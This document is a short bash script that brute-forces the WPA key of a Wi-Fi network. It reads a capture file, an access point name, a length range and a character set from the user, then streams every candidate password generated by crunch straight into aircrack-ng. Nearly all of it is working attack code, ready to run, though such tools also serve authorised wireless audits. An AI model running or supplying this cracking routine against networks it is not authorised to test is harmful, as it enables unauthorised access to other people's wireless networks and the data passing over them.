# crunch-to-aircrack passthrough #!/bin/bash # tells crunch to generate passwords within a user-defined range, # then pipes the output to aircrack-ng # this saves a TON of disk-space and time and energy ############################################################################ # path and filename of 'crunch' -- wordlist generator # can be found here: http://sourceforge.net/projects/crunch-wordlist/ CRUNCH="/pentest/passwords/crunch/./crunch" echo "!! Crunch-to-Aircrack passthrough script" echo "" echo "?? This script reads a cap file and certain ranges for passwords," echo " then runs 'crunch' to generate passwords in these ranges," echo " while piping the output to aircrack-ng" echo "" echo ":: Found passwords are saved to [CapFilename].txt." echo " (eg. a cap file named 'wpa-01.cap' would be saved as 'wpa-01.txt')" echo "" echo "-> Enter the filename of the .CAP file (without the .cap):" echo " (eg. '/root/wpa-01.cap' would be '/root/wpa-01')" read CAP echo "" echo "-> Enter the ESSID (name) of the access point:" echo " (eg. NETGEAR)" read ESSID echo "" echo "-> Enter minimum length (eg. 8):" read MIN echo "" echo "-> Enter maximum length (eg. 63):" read MAX echo "" echo "-> Enter letters to use (eg. 0123456789):" read CHARSET ${CRUNCH} ${MIN} ${MAX} ${CHARSET} | aircrack-ng -w - -e ${ESSID} ${CAP}.cap